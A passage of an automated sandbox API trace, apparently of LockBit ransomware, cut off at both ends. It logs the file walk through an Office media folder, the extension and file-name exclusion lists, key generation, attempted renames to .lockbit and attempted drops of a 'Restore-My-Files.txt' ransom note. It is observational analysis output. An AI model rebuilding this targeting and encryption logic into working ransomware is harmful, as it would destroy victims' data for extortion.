cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.874] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.874] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.874] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.875] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.891] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.891] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.891] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.891] free (_Block=0x1fa2ed8) [0205.891] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14538_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.891] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.891] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.891] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa0af000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbc906040, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaa0af000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x5ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14539_.GIF", cAlternateFileName="")) returned 1 [0205.891] lstrcmpiW (lpString1=".", lpString2="BD14539_.GIF") returned -1 [0205.891] lstrcmpiW (lpString1="..", lpString2="BD14539_.GIF") returned -1 [0205.891] PathFindExtensionW (pszPath="BD14539_.GIF") returned=".GIF" [0205.891] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.891] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.891] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.891] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.891] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.892] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.892] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.893] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14539_.GIF") returned 1 [0205.893] lstrcmpiW (lpString1="ntldr", lpString2="BD14539_.GIF") returned 1 [0205.893] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14539_.GIF") returned 1 [0205.893] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14539_.GIF") returned 1 [0205.893] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14539_.GIF") returned -1 [0205.893] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14539_.GIF") returned 1 [0205.893] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14539_.GIF") returned 1 [0205.893] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.893] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF") returned=".GIF" [0205.893] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.893] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.893] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.893] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.893] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.893] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.894] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.894] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.894] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF.lockbit") returned 76 [0205.894] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14539_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.896] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.896] malloc (_Size=0x40068) returned 0x3df0008 [0205.896] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=1451) returned 1 [0205.896] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.897] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.897] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.897] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.897] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.916] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.916] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.916] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.916] free (_Block=0x1fa2ed8) [0205.916] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14539_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.916] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.917] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.917] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a96b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x84a96b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x25b, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14594_.GIF", cAlternateFileName="")) returned 1 [0205.917] lstrcmpiW (lpString1=".", lpString2="BD14594_.GIF") returned -1 [0205.917] lstrcmpiW (lpString1="..", lpString2="BD14594_.GIF") returned -1 [0205.917] PathFindExtensionW (pszPath="BD14594_.GIF") returned=".GIF" [0205.917] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.917] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.917] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.918] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.918] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.918] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.918] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.918] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.918] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14594_.GIF") returned 1 [0205.918] lstrcmpiW (lpString1="ntldr", lpString2="BD14594_.GIF") returned 1 [0205.919] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14594_.GIF") returned 1 [0205.919] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14594_.GIF") returned 1 [0205.919] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14594_.GIF") returned -1 [0205.919] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14594_.GIF") returned 1 [0205.919] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14594_.GIF") returned 1 [0205.919] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.919] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF") returned=".GIF" [0205.919] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.919] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.919] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.920] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.920] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF.lockbit") returned 76 [0205.920] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14594_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0205.921] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.921] malloc (_Size=0x40068) returned 0x3df0008 [0205.921] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=603) returned 1 [0205.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.922] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.922] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0205.922] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.923] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.923] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0205.923] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0205.927] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.927] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.927] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0xc0000008 [0205.927] free (_Block=0x1fa2ed8) [0205.927] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14594_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.927] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.927] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.927] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84a96b00, ftCreationTime.dwHighDateTime=0x1bd8f90, ftLastAccessTime.dwLowDateTime=0xbc952300, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x84a96b00, ftLastWriteTime.dwHighDateTime=0x1bd8f90, nFileSizeHigh=0x0, nFileSizeLow=0x1d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14595_.GIF", cAlternateFileName="")) returned 1 [0205.927] lstrcmpiW (lpString1=".", lpString2="BD14595_.GIF") returned -1 [0205.927] lstrcmpiW (lpString1="..", lpString2="BD14595_.GIF") returned -1 [0205.927] PathFindExtensionW (pszPath="BD14595_.GIF") returned=".GIF" [0205.927] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.927] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.927] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.927] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.927] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.927] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.927] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.927] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.928] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.928] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.929] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.929] lstrcmpiW (lpString1=".rdp", 